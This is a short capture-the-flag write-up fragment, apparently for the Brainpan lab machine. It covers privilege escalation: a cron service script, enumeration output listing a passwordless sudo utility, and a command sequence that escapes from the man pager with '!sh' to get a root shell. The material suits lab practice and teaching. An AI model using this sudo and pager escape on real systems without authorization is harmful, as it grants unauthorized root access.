4 privesc
# checksrv.sh
#!/bin/bash
# run brainpan.exe if it stops
lsof -i:9999
if [[ $? -eq 1 ]]; then
pid=`ps aux | grep brainpan.exe | grep -v grep`
if [[ ! -z $pid ]]; then
kill -9 $pid
killall wineserver
killall winedevice.exe
fi
/usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi
# run SimpleHTTPServer if it stops
lsof -i:10000
if [[ $? -eq 1 ]]; then
pid=`ps aux | grep SimpleHTTPServer | grep -v grep`
if [[ ! -z $pid ]]; then
kill -9 $pid
fi
cd /home/puck/web
/usr/bin/python -m SimpleHTTPServer 10000
fi
Directory of Z:\home
3/4/2013 2:38 PM <DIR> anansi
3/6/2013 3:23 PM <DIR> puck
3/4/2013 2:43 PM <DIR> reynard
PEAS
[+] Cron jobs
* * * * * /home/puck/checksrv.sh
[+] Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
[+] Searching ldap directories and their hashes
/etc/ldap
The password hash is from the {SSHA} to 'structural'
[+] SUID - Check easy privesc, exploits and write perms
-rwsr-xr-x 1 root lpadmin 14K Dec 4 2012 /usr/bin/lppasswd
-rwsr-xr-x 1 anansi anansi 8.6K Mar 4 2013 /usr/local/bin/validate
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
- network
- proclist
- manual [command]
https://gtfobins.github.io/gtfobins/man/
cd /tmp
echo "man man" > top
chmod +x top
sudo /home/anansi/bin/anansi_util manual man
!sh
whoami
root
Last updated